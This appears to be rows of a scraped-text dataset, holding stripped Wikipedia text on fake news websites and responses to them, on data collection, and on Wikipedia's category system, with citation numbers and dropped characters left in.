2014 to 2016. 119 16 Fake stories from Facebook were reprinted in paper periodicals called Facebook and The Internet. 16 False reporting related to practitioners of Islam in the country was directly correlated with increased attacks on people of the religion in Myanmar. 119 16 Fake news fictitiously stated believers in Islam acted out in violence at Buddhist locations. 119 16 BuzzFeed News documented a direct relationship between the fake news and violence against Muslim people. 119 16 It noted countries that were relatively newer to Internet exposure were more vulnerable to the problems of fake news and fraud. 16 Khawaja Muhammad Asif, the Minister of Defence of Pakistan, threatened to nuke Israel on Twitter after a false story claiming that Avigdor Lieberman, the Israeli Ministry of Defense, said "If Pakistan send ground troops into Syria on any pretext, we will destroy this country with a nuclear attack. 172 173 In 2016 Polish historian Jerzy Targalski pl noted fake news websites had infiltrated Poland through anti-establishment and right-wing focused sources that copied content from Russia Today. 174 Targalski observed there existed about 20 specific fake news websites in Poland which spread Russian disinformation in the form of fake news. 174 One example cited was the false claim that Ukraine had claimed that the Polish city of Przemy l was occupied by Poland. 174 In 2020 fake news websites related to the COVID 19 pandemic have been identified and officially labelled as such by the Polish Ministry of Health. 175 The Swedish Security Service issued a report in 2015 identifying propaganda from Russia infiltrating Sweden with the objective to amplify pro-Russian propaganda and inflame societal conflicts. 14 The Swedish Civil Contingencies Agency (MSB), part of the Ministry of Defence of Sweden, identified fake news reports targeting Sweden in 2016 which originated from Russia. 14 Swedish Civil Contingencies Agency official Mikael Tofvesson stated a pattern emerged where views critical of Sweden were constantly repeated. 14 The MSB identified Russia Today and Sputnik News as significant fake news purveyors. 14 As a result of growth in this propaganda in Sweden, the MSB planned to hire six additional security officials to fight back against the campaign of fraudulent information. 14 In a report in December 2015 by The China Post, a fake video shared online showed people a light show purportedly made at the Shihmen Reservoir. 176 The Northern Region Water Resources Office confirmed there was no light show at the reservoir and the event had been fabricated. 176 The fraud led to an increase in tourist visits to the actual attraction. 176 Deutsche Welle interviewed the founder of Stopfake.org in 2014 about the website's efforts to debunk fake news in Ukraine, including media portrayal of the Ukrainian crisis. 177 Co-founder Margot Gontar began the site in March 2014, and it was aided by volunteers. 177 In 2014, Deutsche Welle awarded the fact-checker website with the People's Choice Award for Russian in its ceremony The BOBs, recognizing excellence in advocacy on the Internet. 177 Gontar highlighted an example debunked by the website, where a fictitious "Doctor Rozovskii" supposedly told The Guardian pro-Ukraine individuals refused to allow him to tend to injured in fighting with Russian supporters in 2014. 177 Stopfake.org exposed the event was fabricated—there actually was no individual named "Doctor Rozovskii", and found the Facebook photo distributed with the incident was of a different individual from Russia with a separate identity. 177 Former Ukraine president Viktor Yanukovych's ouster from power created instability, and in 2015 the Organization for Security and Co-operation in Europe concluded Russian disinformation campaigns used fake news to disrupt relations between Europe and Ukraine. 99 Russian-financed news spread disinformation after the conflict in Ukraine motivated the European Union to found the European External Action Service specialist task force to counter the propaganda. 99 Labour MP Michael Dugher was assigned by Deputy Leader of the Labour Party Tom Watson in November 2016 to investigate the impact of fake news spread through social media. 178 Watson said they would work with Twitter and Facebook to root out clear-cut circumstances of "downright lies". 178 Watson wrote an article for The Independent where he suggested methods to respond to fake news, including Internet-based societies which fact-check in a manner modeled after Wikipedia. 179 Minister for Culture, Matthew Hancock, stated the British government would investigate the impact of fake news and its pervasiveness on social media websites. 180 Watson stated he welcomed the investigation into fake news by the government. 180 On 8 December 2016, Chief of the Secret Intelligence Service (MI6) Alex Younger delivered a speech to journalists at the MI6 headquarters where he called fake news and propaganda damaging to democracy. 30 Younger said the mission of MI6 was to combat propaganda and fake news in order to deliver to his government a strategic advantage in the information warfare arena, and assist other nations including European countries. 30 He called such methods of fake news propaganda online as a "fundamental threat to our sovereignty". 30 Younger said all nations that hold democratic values should feel the same worry over fake news. 30 Fraudulent stories during the 2016 U.S. presidential election popularized on Facebook included a viral post that Pope Francis had endorsed Donald Trump, and another that actor Denzel Washington "backs Trump in the most epic way possible". 183 184 Donald Trump's son and campaign surrogate Eric Trump, top national security adviser Michael T. Flynn, and then-campaign managers Kellyanne Conway and Corey Lewandowski shared fake news stories during the campaign. 181 185 186 187 After the 2016 election, Republican politicians and conservative media began to appropriate the term by using it to describe any news they see as hostile to their agenda, according to The New York Times, which cited Breitbart News, Rush Limbaugh and supporters of Donald Trump as dismissing true mainstream news reports, and any news they do not like as "fake news". 188 The Russian state-operated newswire RIA Novosti, known as Sputnik International, reported fake news and fabricated statements by White House Press Secretary Josh Earnest. 189 RIA Novosti falsely reported on 7 December 2016 that Earnest stated sanctions for Russia were on the table related to Syria. 189 RIA Novosti falsely quoted Earnest as saying: "There are a number of things that are to be considered, including some of the financial sanctions that the United States can administer in coordination with our allies. I would definitely not rule that out. 189 However, the word "sanctions" was never used by the Press Secretary. 189 Russia was discussed in eight instances during the press conference, but never about sanctions. 189 The press conference focused solely on Russian air raids in Syria towards rebels fighting President of Syria Bashar al-Assad in Aleppo. 189 Members of the U.S. Senate Intelligence Committee traveled to Ukraine and Poland in March 2016 and heard about Russian operations to influence internal Ukrainian matters. 190 Senator Angus King recalled they were informed about Russia "planting fake news stories" during elections. 190 On 30 November 2016 seven members of the Senate Intelligence Committee asked President Obama to publicize information on Russia's role in spreading disinformation in the U.S. election. 190 191 192 On 30 November 2016, legislators approved a measure within the National Defense Authorization Act to finance the U.S. State Department to act against foreign propaganda. 193 194 The initiative was developed through a bipartisan bill, the Countering Foreign Propaganda and Disinformation Act, written by U.S. Senators Republican Rob Portman and Democrat Chris Murphy. 193 Republican U.S. Senators stated they planned to hold hearings and investigate Russian influence on the 2016 U.S. elections. 195 By doing so they went against the preference of incoming Republican President-elect Donald Trump, who downplayed any potential Russian meddling in the election. 195 Senate Armed Services Committee Chairman John McCain, Senate Intelligence Committee Chairman Richard Burr, U.S. Senate Foreign Relations Committee Chairman Bob Corker, and Senator Lindsey Graham all planned investigations in the 115th U.S. Congress session. 195 U.S. President Barack Obama commented on fake news online in a speech the day before Election Day in 2016, saying social media spread lies and created a "dust cloud of nonsense". 29 196 Obama commented again on the problem after the election: "if we can't discriminate between serious arguments and propaganda, then we have problems. 181 182 On 9 December 2016, President Obama ordered U.S. Intelligence Community to conduct a complete review of the Russian propaganda operation. 197 In his year-end press conference on 16 December 2016, President Obama criticized a hyper-partisan atmosphere for enabling the proliferation of fake news. 198 In November 2016, fake news sites and Internet forums falsely implicated the restaurant Comet Ping Pong and Democratic Party figures as part of a fictitious child trafficking ring, which was dubbed "Pizzagate". 199 The rumor was widely debunked by sources such as the Metropolitan Police Department of the District of Columbia, fact-checking website Snopes.com, The New York Times, and Fox News. 200 201 202 203 The restaurant's owners were harassed and threatened, and increased their security. 199 204 205 On 4 December 2016, an individual from Salisbury, North Carolina, walked into the restaurant to "self-investigate" this conspiracy theory. He brought a semi-automatic rifle, and fired shots before being arrested; no one was injured. 202 206 The suspect told police that he planned to "self-investigate" the conspiracy theory, 202 and was charged with assault with a dangerous weapon, carrying a pistol without a license, unlawful discharge of a firearm, and carrying a rifle or shotgun outside the home or business. 207 After the incident, future National Security Advisor Michael T. Flynn and his son Michael G. Flynn were criticized by many reporters for spreading the rumors. 208 209 210 Two days after the shooting, Trump fired Michael G. Flynn from his transition team in connection with Flynn's Twitter posting of fake news. 211 212 Days after the attack, Hillary Clinton spoke out on the dangers of fake news in a tribute speech to retiring Senator Harry Reid at the U.S. Capitol, and called the problem an epidemic. 213 214 To track junk news shared on Facebook during the 2018 midterm elections, the Junk News Aggregator Archived 2021 01 27 at the Wayback Machine was launched by the Computational Propaganda Project of the Oxford Internet Institute, University of Oxford. This Aggregator is a public platform, offering three interactive tools for tracking in near real-time public posts shared on Facebook by junk news sources, showing the content and the user engagement numbers that these posts have received. 215 Fact-checking websites FactCheck.org, PolitiFact.com and Snopes.com authored guides on how to respond to fraudulent news. 4 40 216 FactCheck.org advised readers to check the source, author, date, and headline of publications. 40 They recommended their colleagues Snopes.com, The Washington Post Fact Checker, b and PolitiFact.com. 40 FactCheck.org admonished consumers to be wary of confirmation bias. 40 PolitiFact.com used a "Fake news" tag so readers could view all stories Politifact had debunked. 216 Snopes.com warned readers social media was used as a harmful tool by fraudsters. 4 The Washington Post's "The Fact Checker" manager Glenn Kessler wrote that all fact-checking sites saw increased visitors during the 2016 election cycle. 218 Unique visitors to The Fact Checker increased five-fold from the 2012 election. 218 Will Moy, director of London-based fact-checker Full Fact, said debunking must take place over a sustained period to be effective. 218 Full Fact worked with Google to help automate fact-checking. 219 FactCheck.org former director Brooks Jackson said media companies devoted increased focus to the importance of debunking fraud during the 2016 election. 217 FactCheck.org partnered with CNN's Jake Tapper in 2016 to examine the veracity of candidate statements. 217 Angie Drobnic Holan, editor of PolitiFact.com, cautioned media companies chiefs must be supportive of debunking, as it often provokes hate mail and extreme responses from zealots. 217 In December 2016, PolitiFact announced fake news was its selection for "Lie of the Year". 220 32 PolitiFact explained its choice for the year: "In 2016, the prevalence of political fact abuse promulgated by the words of two polarizing presidential candidates and their passionate supporters gave rise to a spreading of fake news with unprecedented impunity. 32 PolitiFact called fake news a significant symbol of a culture accepting of post-truth politics. 220 In the aftermath of the 2016 U.S. election, Google and Facebook, faced scrutiny regarding the impact of fake news. 221 The top result on Google for election results was to a fake site. 222 "70 News" had fraudulently written an incorrect headline and article that Trump won the popular vote against Clinton. 223 224 221 Google later stated that prominence of the fake site in search results was a mistake. 225 By 14 November, the "70 News" result was the second link shown when searching for results of the election. 221 When asked shortly after the election whether fake news influenced election results, Google CEO Sundar Pichai responded: "Sure" and went on to emphasize the importance of stopping the spread of fraudulent sites. 226 On 14 November 2016, Google responded to the problem of fraudulent sites by banning such companies from profiting on advertising from traffic through its program AdSense. 26 27 221 Google previously had a policy for denying ads for dieting ripoffs and counterfeit merchandise. 227 Google stated upon the announcement they would work to ban advertisements from sources that lie about their purpose, content, or publisher. 228 229 The ban is not expected to apply to news satire sites like The Onion, although some satirical sites may be inadvertently blocked under the new system. 221 On 25 April 2017, Ben Gomes wrote a blog post announcing changes to the search algorithms that would stop the "spread of blatantly misleading, low quality, offensive or downright false information. 230 On 27 July 2017, the World Socialist Web Site published data that showed a significant drop after the 25 April announcement in Google referrals to left-wing and anti-war websites, including the ACLU, Alternet, and Counterpunch. 231 The World Socialist Web Site insists that the "fake news" charge is a cover to remove anti-establishment websites from public access, and believes the algorithm changes are infringing on the democratic right to free speech. 232 One day after Google took action, Facebook decided to block fake sites from advertising there. 27 221 Facebook said they would ban ads from sites with deceptive content, including fake news, and review publishers for compliance. 228 These steps by both Google and Facebook intended to deny ad revenue to fraudulent news sites; neither company took actions to prevent dissemination of false stories in search engine results pages or web feeds. 26 233 Facebook CEO Mark Zuckerberg called the notion that fraudulent news impacted the 2016 election a "crazy idea" 234 235 and denied that his platform influenced the election. 236 He stated that 99% of Facebook's content was neither fake news nor a hoax. 237 Zuckerberg said that Facebook is not a media company. 238 Zuckerberg advised users to check the fact-checking website Snopes.com whenever they encounter fake news on Facebook. 239 240 Top staff members at Facebook did not feel simply blocking ad revenue from fraudulent sites was a strong enough response, and they made an executive decision and created a secret group to deal with the issue themselves. 234 235 In response to Zuckerberg's first statement that fraudulent news did not impact the 2016 election, the secret Facebook group disputed this notion, saying fake news was rampant on their website during the election cycle. 234 235 The secret task force included dozens of Facebook employees. 234 235 Facebook faced criticism after its decision to revoke advertising revenues from fraudulent news providers, and not take further action. 241 242 After negative media coverage including assertions that fraudulent news gave the 2016 U.S. presidential election to Trump, Zuckerberg posted a second time about it on 18 November 2016. 241 242 The post was a reversal of his earlier comments on the matter where he had discounted the impact of fraudulent news. 242 Zuckerberg said there it was difficult to filter out fraudulent news because he desired open communication. 241 Measures considered and not implemented by Facebook included adding an ability for users to tag questionable material, automated checking tools, and third-party confirmation. 241 The 18 November post did not announce any concrete actions the company would definitively take, or when such measures would be put into usage. 241 242 National Public Radio observed the changes being considered by Facebook to identify fraud constituted progress for the company into a new media entity. 243 On 19 November 2016, BuzzFeed advised Facebook users they could report posts from fraudulent sites. 244 Users could choose the report option: "I think it shouldn't be on Facebook", followed by: "It's a false news story. 244 In November 2016, Facebook began assessing use of warning labels on fake news. 245 The rollout was at first only available to a few users in a testing phase. 245 A sample warning read: "This website is not a reliable news source. Reason: Classification Pending". 245 TechCrunch analyzed the new feature during the testing phase and surmised it may have a tendency towards false positives. 245 Fake news proliferation on Facebook had a negative financial impact for the company. Brian Wieser of Pivotal Research predicted that revenues could decrease by two percentage points due to the concern over fake news and loss of advertising dollars. 246 Shortly after Mark Zuckerberg's second statement on fake news proliferation on his website, Facebook decided to engage in assisting the government of China with a version of its software in the country to allow increased censorship by the government. 247 Barron's contributor William Pesek was highly critical of this move, writing by porting its fake news conundrum to China, Facebook would become a tool in that Communist Party's General Secretary Xi Jinping's efforts to increase censorship. 247 Media scholar Dr. Nolan Higdon argues that relying on tech-companies to solve the issues with false information will exacerbate the problems associated with fake news. 248 Higdon contends that tech-companies lack an incentive for solving the problem because they benefit from the proliferation of fake news. Higdon cites tech-companies utilization of data collection as one of the strongest forces empowering fake news producers. Rather than government regulation or industry censorship, Higdon argues for the introduction of critical news literacy education to American education. 248 Society of Professional Journalists president Lynn Walsh said in November 2016 that they would reach out to Facebook to assist weeding out fake news. 249 Walsh said Facebook should evolve and admit it functioned as a media company. 249 On 17 November 2016, the Poynter International Fact-Checking Network (IFCN) c published an open letter on the Poynter Institute website to Mark Zuckerberg, imploring him to utilize fact-checkers to identify fraud on Facebook. 252 253 Signatories to the 2016 letter to Zuckerberg featured a global representation of fact-checking groups, including: Africa Check, FactCheck.org, PolitiFact.com, and The Washington Post Fact Checker. 252 253 In his second post on the matter on 18 November 2016, Zuckerberg responded to the fraudulent news problem by suggesting usage of fact-checkers. 239 240 He specifically identified fact-checking website Snopes.com, and pointed out that Facebook monitors links to such debunkers in reply comments to determine which original posts were fraudulent. 239 240 On 15 December 2016, Facebook announced more specifics in its efforts to combat fake news and hoaxes on its site. 254 28 255 The company said it would form a partnership with fact-checking groups that had joined the Poynter International Fact-Checking Network fact-checkers' code of principles, to help debunk fraud on the site. 28 254 It was the first instance Facebook had ever given third-party entities highlighted featuring in its News Feed, a significant motivator of web traffic online. 28 The fact-checking organizations partnered with Facebook in order to confirm whether or not links posted from one individual to another on the site were factual or fraudulent. 28 Facebook did not finance the fact-checkers, and acknowledged they could see increased traffic to their sites from the partnership. 28 Fact-checking organizations that joined Facebook's initiative included: ABC News, The Washington Post, Snopes.com, FactCheck.org, PolitiFact, and the Associated Press. 28 Fraudulent articles will receive a warning tag: "disputed by third party fact-checkers". 254 The company planned to start with obvious cases of hoaxes shared specifically for fraudulent purposes to gain money for the purveyor of fake news. 28 Users may still share such tagged articles, and they will show up farther down in the news feed with an accompanying warning. 254 Facebook will employ staff researchers to determine whether website spoofing has occurred, for example "washingtonpost.co" instead of the real washingtonpost.com. 255 In a post on 15 December, Mark Zuckerberg acknowledged the changing nature of Facebook: "I think of Facebook as a technology company, but I recognize we have a greater responsibility than just building technology that information flows through. While we don't write the news stories you read and share, we also recognize we're more than just a distributor of news. We're a new kind of platform for public discourse and that means we have a new kind of responsibility to enable people to have the most meaningful conversations, and to build a space where people can be informed. 255 New York magazine contributor Brian Feldman created a Google Chrome extension that would warn users about fraudulent news sites. 256 He invited others to use his code and improve upon it. 256 Upworthy co-founder and The Filter Bubble author Eli Pariser launched an open-source model initiative on 17 November 2016 to address false news. 257 258 Pariser began a Google Document to collaborate with others online on how to lessen the phenomenon of fraudulent news. 257 258 Pariser called his initiative: "Design Solutions for Fake News". 257 Pariser's document included recommendations for a ratings organization analogous to the Better Business Bureau, and a database on media producers in a format like Wikipedia. 257 258 Writing for Fortune, Matthew Ingram agreed with the idea that Wikipedia could serve as a helpful model to improve Facebook's analysis of potentially fake news. 259 Ingram concluded Facebook could benefit from a social network form of fact-checking similar to Wikipedia's methods while incorporating debunking websites such as PolitiFact.com. 259 Pope Francis, the leader of the Roman Catholic Church, spoke out against fake news in an interview with the Belgian Catholic weekly Tertio (magazine) nl on 7 December 2016. 260 The Pope had prior experience being the subject of a fake news website fiction—during the 2016 U.S. election cycle, he was falsely said to support Donald Trump for president. 260 183 184 Pope Francis said the singular worst thing the news media could do was spreading disinformation and that amplifying fake news instead of educating society was a sin. He compared salacious reporting of scandals, whether true or not, to coprophilia and the consumption of it to coprophagy. 261 262 263 264 The Pope said that he did not intend to offend with his strong words, but emphasized that "a lot of damage can be done" when the truth is disregarded and slander is spread. 262 264 Jamie Condliffe wrote that banning ad revenue from fraudulent sites was not aggressive enough action by Facebook to deal with the problem, and did not prevent fake news from appearing in Facebook news feeds. 92 University of Michigan political scientist Brendan Nyhan criticized Facebook for not doing more to combat fake news amplification. 265 Indiana University computer science professor Filippo Menczer commented on measures by Google and Facebook to deny fraudulent sites revenue, saying it was a good step to reduce motivation for fraudsters. 266 Menczer's research team engaged in developing an online tool titled: Hoaxy — to see the pervasiveness of unconfirmed assertions as well as related debunking on the Internet. 267 Zeynep Tufekci wrote critically about Facebook's stance on fraudulent news sites, stating that fraudulent websites in North Macedonia profited handsomely off false stories about the 2016 U.S. election. 268 Tufecki wrote that Facebook's algorithms, and structure exacerbated the impact of echo chambers and increased fake news blight. 268 In 2016 Melissa Zimdars, associate professor of communications at Merrimack College, 269 created a handout for her Introduction to Mass Communication students titled "False, Misleading, Clickbait-y, and or Satirical 'News' Sources" and posted it on Google docs. 270 It was circulated on social media, and on 15 November 2016, the Los Angeles Times published the class handout under the title "Want to keep fake news out of your newsfeed? College professor creates list of sites to avoid". 271 Zimdars said that the list "wasn't intended to be widely distributed", and expressed concern that "people are taking it as this list of 'fake' sites, which is not its purpose". On 17 November 2016 Zimdars deleted the list. 272 On 3 January 2017, Zimdars replaced the original handout with a new list at the same URL. 273 The new list has removed most of the sites from the original handout, added many new sites, and greatly expanded the categories. Stanford University professors Sam Wineburg and Sarah McGrew authored a 2016 study analyzing students' ability to discern fraudulent news from factual. 274 275 The study took place over a year-long period of time, and involved a sample size of over 7,800 responses from university, secondary and middle school students in 12 states within the United States. 274 275 They were surprised at the consistency with which students thought fraudulent news reports were factual. 274 275 The study found 82% of students in middle school were unable to differentiate between an advertisement denoted as sponsored content from an actual news article. 276 The authors concluded the solution was to educate online media consumers to themselves behave like fact-checkers — and actively question the veracity of all sources. 274 275 277 A 2019 study in the journal Science, which examined dissemination of fake news articles on Facebook in the 2016 election, found that sharing of fake news articles on Facebook was "relatively rare", conservatives were more likely than liberals or moderates to share fake news, and there is a "strong age effect", whereby individuals over 65 are vastly more likely to share fake news than younger cohorts. 278 Another 2019 study in Science found, "fake news accounted for nearly 6% of all news consumption on Twitter , but it was heavily concentrated—only 1% of users were exposed to 80% of fake news, and 0.1% of users were responsible for sharing 80% of fake news. Interestingly, fake news was most concentrated among conservative voters. 279 Scientist Emily Willingham has proposed applying the scientific method to fake news analysis. 280 She had previously written on the topic of differentiating science from pseudoscience, and proposed applying that logic to fake news. 280 She calls the recommended steps Observe, Question, Hypothesize, Analyze data, Draw conclusion, and Act on results. 280 Willingham suggested a hypothesis of "This is real news", and then forming a strong set of questions to attempt to disprove the hypothesis. 280 These tests included: check the URL, date of the article, evaluate reader bias and writer bias, double-check the evidence, and verify the sources cited. 280 University of Connecticut philosophy professor Michael P. Lynch said that a troubling number of individuals make determinations relying upon the most recent piece of information they've consumed. 31 He said the greater issue however was that fake news could make people less likely to believe news that really is true. 31 Lynch summed up the thought process of such individuals, as ...ignore the facts because nobody knows what's really true anyway. 31 In 2019, David Lazer and other researchers, from Northeastern University, Harvard University, and the University at Buffalo, analyzed engagement with a previously defined set of fake news sources on Twitter. They found that such engagement was highly concentrated both among a small number of websites and a small number of Twitter users. Five percent of the sources accounted for over fifty percent of exposures. Among users, 0.1 percent consumed eighty percent of the volume from fake news sources. 281 |
15 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_collection | Data collection or data gathering is the process of gathering and measuring information on targeted variables in an established system, which then enables one to answer relevant questions and evaluate outcomes. Data collection is a research component in all study fields, including physical and social sciences, humanities, 2 and business. While methods vary by discipline, the emphasis on ensuring accurate and honest collection remains the same. The goal for all data collection is to capture evidence that allows data analysis to lead to the formulation of credible answers to the questions that have been posed. Regardless of the field of or preference for defining data (quantitative or qualitative), accurate data collection is essential to maintain research integrity. The selection of appropriate data collection instruments (existing, modified, or newly developed) and delineated instructions for their correct use reduce the likelihood of errors. Data collection and validation consist of four steps when it involves taking a census and seven steps when it involves sampling. 3 A formal data collection process is necessary, as it ensures that the data gathered are both defined and accurate. This way, subsequent decisions based on arguments embodied in the findings are made using valid data. 4 The process provides both a baseline from which to measure and in certain cases an indication of what to improve. Data management platforms (DMP) are centralized storage and analytical systems for data, mainly used in marketing. DMPs exist to compile and transform large amounts of demand and supply data into discernible information. Marketers may want to receive and utilize first, second and third-party data.DMPs enable this, because they are the aggregate system of DSPs (demand side platform) and SSPs (supply side platform). DMPs are integral for optimizing and future advertising campaigns. The main reason for maintaining data integrity is to support the observation of errors in the data collection process. Those errors may be made intentionally (deliberate falsification) or non-intentionally (random or systematic errors). 5 There are two approaches that may protect data integrity and secure scientific validity of study results: 6 QA's focus is prevention, which is primarily a cost-effective activity to protect the integrity of data collection. Standardization of protocol, with comprehensive and detailed procedure descriptions for data collection, are central for prevention. The risk of failing to identify problems and errors in the research process is often caused by poorly written guidelines. Listed are several examples of such failures: There are serious concerns about the integrity of individual user data collected by cloud computing, because this data is transferred across countries that have different standards of protection for individual user data. 7 Information processing has advanced to the level where user data can now be used to predict what an individual is saying before they even speak. 8 Since QC actions occur during or after the data collection, all the details can be carefully documented. There is a necessity for a clearly defined communication structure as a precondition for establishing monitoring systems. Uncertainty about the flow of information is not recommended, as a poorly organized communication structure leads to lax monitoring and can also limit the opportunities for detecting errors. Quality control is also responsible for the identification of actions necessary for correcting faulty data collection practices and also minimizing such future occurrences. A team is more likely to not realize the necessity to perform these actions if their procedures are written vaguely and are not based on feedback or education. Data collection problems that necessitate prompt action: |
16 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Help:Category | Categories are intended to group together pages on similar subjects. They are implemented by a MediaWiki feature that adds any page with a text like Category:XYZ in its wiki markup to the automated listing that is the category with name XYZ. Categories help readers to find, and navigate around, a subject area, to see pages sorted by title, and to thus find article relationships. Categories are normally found at the bottom of an article page. Clicking a category name brings up a category page listing the articles (or other pages) that have been added to that particular category. There may also be a section listing the subcategories of that category. The subcategorization feature makes it possible to organize categories into tree-like structures to aid navigation. The term category does refer to both the title of a category page—the category pagename—and the category itself. Keeping this in mind while reading about categorization, plus learning a category page layout is a worthwhile investment in research techniques. (See also the search box parameter "incategory".) The layout of a category page is mostly text, but see about displaying category trees below. The MediaWiki software maintains tables of categories, to which any editable page can be added. To add a page to a category, include Category:Category name or Category:Category name Sortkey in that page's wiki markup. The categories to which a page belongs appear in a box at the bottom of the page. A category is usually associated with a category page in the "Category: namespace. 1 A category page contains text that can be edited, like any other page, but when the page is displayed, the last part of what is displayed is an automatically generated list of all pages in that category, in the form of links. Other category pages which appear in this list are treated separately, as subcategories. A category page is any page in the Category namespace. They each act as a category, and are termed a "category". The category page has one section titled Subcategories listing other "categories", and one section titled Pages, listing pages as categorized (in other namespaces). New categories are created by creating a page in the Category namespace. A category page can be edited like any other page. However, when it is displayed, the editable part of the page is followed by automatically generated lists of pages belonging to the category, as follows: The items in the lists all link to the pages concerned; in the case of the images this applies both to the image itself and to the text below it (the name of the image). For the way in which the lists are ordered, see Sorting category pages below. The first and second lists are divided into sections, according to the first character of the sort key. These initial characters are displayed above the sections. To suppress these, make all sort keys start with a space. A category page can only display a limited number of items (currently 200). If more pages belong to the category, there will be a link to the next ones. The categories box for the category page appears at the bottom, in the same place as for other pages. This contains the categories to which the current category page has been added, i.e., its parent categories (the categories of which it is a subcategory). Add a category page to other categories in the normal way, using the Category:Category name or Category:Category name Sortkey syntax. A page becomes part of a category if the page's wiki markup contains a declaration for that category. A category declaration takes the form Category:Category name or Category:Category name Sortkey . The declaration must be processed, i.e. it will not work if it appears between nowiki ... nowiki or includeonly ... includeonly tags, or in a comment. The declaration may however come from a transcluded page; see Categories and templates below. A category name can be any string that would be a legitimate page title. If the category name begins with a lower-case letter, it will be capitalized. For initial lower-case letters, as in Category:macOS, see the technical restrictions page. On Wikipedia, it is customary to place category declarations at the end of the wiki markup, but before any stub templates (which themselves transclude categories) and interlanguage links. When a page has been added to one or more categories, a categories box appears at the bottom of the page (or possibly elsewhere, if a non-default skin is being used). This box contains a list of the categories the page belongs to, in the order in which the category declarations appear in the processed wiki markup. The category names are linked to the corresponding category pages. They appear as red links if the corresponding category page does not exist. If a user has enabled the HotCat gadget, the categories box will also provide links to quickly add, remove, or modify category declarations on the page, without having to edit the whole page. Hidden categories are not displayed, except as described below under Hiding categories. The following subsections are ordered from simple actions to more elaborate or rarer actions. To link to a category page without putting the current page in that category, precede the link with a colon: :Category:Category name . Such a link can be piped like a normal wikilink. (The cl template, and others listed on its documentation page, may sometimes be helpful.) Raw information about the members of a category, their sort keys and timestamps (time when last added to the category) can be obtained from the API, using a query of the form: Listings of up to 500 members are possible. If there are more members then the results will include text near the end like this: categorymembers cmcontinue "page NNNN TITLE" . This can be added to the previous one, without quotation marks, for the next page of members: ... cmcontinue page NNNN TITLE By default, a page is sorted under the first character of its name, without the namespace. English Wikipedia groups accented characters together with their unaccented version, so pages starting with , , , will be listed under heading A. Sorting is case-insensitive, so "ABC" comes after "Abacus". Unlike at Special:Allpages and Special:Prefixindex, a space is treated as a space (coming before all other characters), not as an underscore. The English Wikipedia has numerical sorting in categories. This means a page whose title begins with a number will be sorted according to the numeric value of the number (even if it is multiple digits). Thus "9 dogs", "25 dogs", and "112 dogs" will all appear under the "0 9" heading in numeric order. If the number includes a comma, space, or period, the sorting algorithm will only consider the part of the number before the separator. Each of the three lists (subcategories, pages, media files) is arranged in the order explained above (except that, in the subcategories list, the namespace indicator "Category: is not considered). If an item ought to be positioned within a list on the basis of an alternative name (sort key) for that item, then this can be specified in the category tag that places the item in the list: For example, to add an article called Albert Einstein to Category:1879 births and have the article sorted by "Einstein, Albert", you would type: Unlike a piped link (which uses the same syntax), the sort key itself is not displayed to readers. It affects only the order in which pages are listed on the category page. It is useful to document the system being used for sort keys on the category page. For guidelines about the use of sort keys on Wikipedia, see WP:SORTKEY. It is possible to set a default sort key which is different from PAGENAME by using the magic word DEFAULTSORT: : This is often used in biography articles, to make sure the subject is sorted by their last name: For example, on the Albert Einstein page, DEFAULTSORT:Einstein, Albert adds the sort key "Einstein, Albert" to all his categories, such as Category:1879 births. In the case of multiple default sort key tags, the last DEFAULTSORT on the final rendering of a page applies for all categories, regardless of the position of the category tags. This also means that a DEFAULTSORT tag included from a template is not effective if another DEFAULTSORT tag occurs later on the page, even if the later DEFAULTSORT tag is also "hidden" (included by another template). If a category is added inside ref ... ref then DEFAULTSORT may be ignored. In addition to browsing through hierarchies of categories, it is possible to use the search tool to find specific articles in specific categories. To search for articles in a specific category, type incategory:"CategoryName" in the search box. A pipe can be added to join the contents of one category with the contents of another. For example, enter to return all pages that belong to either (or both) of the categories, as here. Note that using search to find categories will not find articles which have been categorized using templates. This feature also doesn't return pages in subcategories. Special:Categories provides an alphabetic list of all categories, with the number of members of each; this number does not include the content of the subcategories, but it includes the subcategories themselves, i.e., each counting as one. The above list contains all categories that have members, regardless of whether they have corresponding category pages. To list all existing category pages (regardless of whether they have members), use Special:AllPages Category:. As described at mw:Help:Magic words, PAGESINCATEGORY:Example or PAGESINCAT:Example returns the number of pages in "Category:Example". Each subcategory counts as one page; pages in subcategories are not counted. The page Special:CategoryTree enables you to see the tree structure of a category (its subcategories, their subcategories and so on; the display of files and other member pages is optional). The CategoryTree extension can be used to display such a tree on any page. (This is sometimes done on the category page itself, if the category is split over multiple screens, to make all subcategories available on every screen.) The basic syntax is to display just the subcategory tree, and to display member pages as well. They will be indicated by italics. Dapete's category-visualizer vCat will render charts of the tree structure. You may also use Template:Category tree or Template:Category tree all, instead. Warning: Categories can be moved in the same way as an ordinary page; but a certain amount of cleanup may be necessary. A redirect is left at the old category name, and this is not a normal REDIRECT ... but a category redirect . Once all the pages have been moved out of the old category, it may be left as a category redirect or deleted. For categories entirely populated through templates (see above), modifying the templates enables all affected articles to be moved to another category, but with the refresh problem mentioned. Almost all category name changes are made pursuant to a consensus decision at Wikipedia:Categories for discussion. Do not create intercategory redirects other than with a category redirect template. See Wikipedia:Categories for discussion Redirecting categories for more on category redirects. When the magic word HIDDENCAT is placed on a category page, that category becomes hidden, meaning that it will not be displayed on the pages belonging to that category. On Wikipedia, the magic word is not normally used explicitly, but is applied through the hidden category template. The feature is mostly used to prevent project maintenance categories from showing up to ordinary readers on article pages. For users who are not logged in, hidden categories are displayed on category pages (whether as parent categories or subcategories). Hidden categories are displayed at the bottom of each page, after "Hidden categories: , for registered users: Hidden categories are automatically added to Category:Hidden categories. For guidelines on the hiding of categories on Wikipedia, see WP:HIDDENCAT. The most effective way of finding entries of a category is using the "What links here" tool on the category's main article. An easy way to find relevant articles for a new category or missing entries in an existing one is by finding the most relevant list and checking its entries. Sometimes categories are about things that are intersections of other categories for which the PetScan tool can be used. More relevant articles may also be found linked in a category's main article and the articles already featured in the category especially in their "See also" sections (if existent) and the automatically suggested "RELATED ARTICLES" below them. Furthermore, a category's superordinate categories often feature articles that should be subcategorized to the category. Other ways to find relevant articles include searching Wikipedia for the category's topic and searching the Web for the topic in quotes (with synonyms also in quotes and appended after an OR) and appending the word wiki or Wikipedia or site:Wikipedia.org to them. Templates are categorized the same way as articles, except that Category: Some-topic templates should be placed on the template's documentation page (or inside noinclude ... noinclude tags, if there is no documentation page), this is necessary to avoid categorizing pages by template inclusion (see below). A template can be used to add pages to a category, usually by placing the category link inside includeonly includeonly tags on the template 